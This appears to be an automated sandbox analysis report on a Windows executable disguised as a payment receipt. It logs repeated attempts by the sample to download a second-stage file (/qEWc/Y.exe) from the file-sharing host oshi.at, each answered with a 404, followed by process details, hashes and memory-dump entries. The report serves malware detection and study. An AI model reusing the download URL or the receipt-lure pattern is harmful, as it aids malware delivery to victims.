                                2023-11-01 07:36:27 UTC26INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.7497135.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:34:00 UTC4OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:34:19 UTC4INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:34:19 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:34:19 UTC4INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.7497155.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:34:24 UTC6OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:34:28 UTC6INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:34:28 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:34:28 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                4192.168.2.7497165.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:34:34 UTC8OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:34:35 UTC8INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:34:35 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:34:35 UTC8INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                5192.168.2.7497175.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:34:40 UTC10OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:34:41 UTC10INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:34:41 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:34:41 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                6192.168.2.7497225.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:34:47 UTC12OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:34:52 UTC12INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:34:51 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:34:52 UTC12INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                7192.168.2.7497235.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:34:57 UTC14OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:34:58 UTC14INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:34:58 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:34:58 UTC14INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                8192.168.2.7497245.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:35:04 UTC16OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:35:11 UTC16INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:35:11 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:35:11 UTC16INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                9192.168.2.7497255.253.86.15443C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                TimestampkBytes transferredDirectionData
                                2023-11-01 07:35:16 UTC18OUTGET /qEWc/Y.exe HTTP/1.1
                                Host: oshi.at
                                2023-11-01 07:35:25 UTC18INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Wed, 01 Nov 2023 07:35:24 GMT
                                Content-Type: text/html;charset=UTF-8
                                Content-Length: 1849
                                Connection: close
                                2023-11-01 07:35:25 UTC18INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:08:33:21
                                Start date:01/11/2023
                                Path:C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
                                Imagebase:0xce0000
                                File size:65'088 bytes
                                MD5 hash:488CD0C21974D76054D33936D477E0CD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:low
                                Has exited:false

                                Target ID:18
                                Start time:09:41:19
                                Start date:01/11/2023
                                Path:C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
                                Imagebase:0x7ff7f1180000
                                File size:21'504 bytes
                                MD5 hash:7F4A25126DC7ABB0A94B1BC62587AF37
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Reset < >
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q$O>f$TJq$Teq$UUUU$pq$xbq$.9l
                                  • API String ID: 0-3024170395
                                  • Opcode ID: 61279c31ffb6a767f31e0e648752e2d8b163b758acf1d7980a1b40f5353ec64e
                                  • Instruction ID: 00d2ef361c0dc0b02b4e3fc6c7c43f31c53ea6f684ef5aed67f9b71d33915b57
                                  • Opcode Fuzzy Hash: 61279c31ffb6a767f31e0e648752e2d8b163b758acf1d7980a1b40f5353ec64e
                                  • Instruction Fuzzy Hash: 93B2AC75A00228DFDB64CF69C984BD9BBB2BF89304F1481E9D50DAB265DB319E81CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TJq$Teq$xbq
                                  • API String ID: 0-4091408781
                                  • Opcode ID: 05660fbbce06b331f2c5d6807d5c975224c0581feccfbaa5b93847066386278a
                                  • Instruction ID: 305851aa6a867183371143b90b3d957a18a7db6990a3de16a2a41fab9e0a8c7e
                                  • Opcode Fuzzy Hash: 05660fbbce06b331f2c5d6807d5c975224c0581feccfbaa5b93847066386278a
                                  • Instruction Fuzzy Hash: 53C173B5E006188FDB68DF6AD9446DDBBF2AF89304F14C1AAD51DAB264DB305E81CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78773d7509930ee50f6cbc319d2b9b0733af2a8742398823f1c3e6ecbe039497
                                  • Instruction ID: 4d9c7fd964d5b8099b5c3c45e76f8e5994fcf688d2e7174612e9d03ffb76af54
                                  • Opcode Fuzzy Hash: 78773d7509930ee50f6cbc319d2b9b0733af2a8742398823f1c3e6ecbe039497
                                  • Instruction Fuzzy Hash: B4712370D85219CFDBA4DFA9D8987EDBBF6FB89304F10A069DA09A7245DB744885CF00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d40140be8bc1309d5d83720c3ed49c19ec859fe69edd951e515053fda0e955d2
                                  • Instruction ID: 8232e01485e7511bbe48a4679834b2a1cfcd9210e83b47f596ab4f986301dc56
                                  • Opcode Fuzzy Hash: d40140be8bc1309d5d83720c3ed49c19ec859fe69edd951e515053fda0e955d2
                                  • Instruction Fuzzy Hash: 91610174D81219CFDBA4DFA9D4987EDBBF1FB49304F10A069DA09AB244DB748985CF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc46c7d8936728093eb2c5c2ae255347bb4d0f803f8a5a9872bed827c3135d31
                                  • Instruction ID: 899dc5b28205d90cf2337a8b12a3fe01817550dc78619722ef4dbf8cbe80aac8
                                  • Opcode Fuzzy Hash: fc46c7d8936728093eb2c5c2ae255347bb4d0f803f8a5a9872bed827c3135d31
                                  • Instruction Fuzzy Hash: 045102B4D85219CFDBA0DFA8D4987EDBBF1FB49304F10A069DA09A7244DB749985CF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48b23cdb44aea1c1eef3ec4fe53ee6ccfeccbb8f618fb955861008fc134fb2a6
                                  • Instruction ID: 7760ae464bb6987081688002275d9120201080fb84ce4003befeae714acdc205
                                  • Opcode Fuzzy Hash: 48b23cdb44aea1c1eef3ec4fe53ee6ccfeccbb8f618fb955861008fc134fb2a6
                                  • Instruction Fuzzy Hash: AF5142B4C05299CFEB44DFA9E8583EEBBF0FB49304F00A06AD515A7289D7784A45CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 645c312e56b8b10a31d358c95942572384718bbf155e7e5e9afb74dda46fdbb4
                                  • Instruction ID: e8b97646e9e80382bfa5cf87efb98e35b5f04f8b288feacb686b566dd3980945
                                  • Opcode Fuzzy Hash: 645c312e56b8b10a31d358c95942572384718bbf155e7e5e9afb74dda46fdbb4
                                  • Instruction Fuzzy Hash: 30513FB4D01289CFEB54EFA9E8487EEBBF0FB49305F009029D515A7298D7780A84CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6e5fd5fe3e6dd257f51a58ba4c77d73765c88bd481ff0ed31a7bc6643b18718
                                  • Instruction ID: a9a3368280f13535e7c80487865198f686402f2781edfbbe64d76a83fc16f518
                                  • Opcode Fuzzy Hash: b6e5fd5fe3e6dd257f51a58ba4c77d73765c88bd481ff0ed31a7bc6643b18718
                                  • Instruction Fuzzy Hash: 8B4110B4D01249DFEB54EFA9E8487EEBBF1FB48304F009029D615A3288D7784A40CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3115180591.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_12dd000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8edfb81425644fc803ac30656bfc3ff3f3c005ae4501c21a1d4254f37ff0ae72
                                  • Instruction ID: 1e35dcb2392c84354b085fb89b0841d7c0f9a15390e106af09c2255f33d74260
                                  • Opcode Fuzzy Hash: 8edfb81425644fc803ac30656bfc3ff3f3c005ae4501c21a1d4254f37ff0ae72
                                  • Instruction Fuzzy Hash: 1A214571514608DFDB15DF54D9C0F66BF61FB88324F20C56DE9090B286C336E456CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3115180591.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_12dd000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                  • Instruction ID: eef4cedd9ee29af67fa3ec2648a99257b9dd314664deb004bcd6dadfa6e2f75e
                                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                  • Instruction Fuzzy Hash: 55110376504244CFCB06CF44D9C4B56BF72FB84324F24C5A9D9090B297C336E456CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1397a97be52f56ba7b0031b69a242c3c32545aea277772828250ba75f26bd85e
                                  • Instruction ID: f9f38203119a0253d080fb7ad1ab89f2d6c1bdd8438deaea2a9cec25f67a58b0
                                  • Opcode Fuzzy Hash: 1397a97be52f56ba7b0031b69a242c3c32545aea277772828250ba75f26bd85e
                                  • Instruction Fuzzy Hash: 59F01570D04348AFCB54DFA8A4156DDBFF0AF86304F1081AAC844AB311E3344A11DF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2ef0000_PAYMENT_RECEIPT_STAN100699.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75bbd61cd1bc69f747af3929374cf044f30f22a87d9f6a895636c5625a111f8e
                                  • Instruction ID: 0bb3370bb397ae62966120da7b804c0dcbbe9bd3eb038876b25a9cf88f073f37
                                  • Opcode Fuzzy Hash: 75bbd61cd1bc69f747af3929374cf044f30f22a87d9f6a895636c5625a111f8e
                                  • Instruction Fuzzy Hash: 46F03470D04288AFCB81DFA8D454A9CBFF0EF4A210F14C1EAC848A7352D3329A12DB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3121161825.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
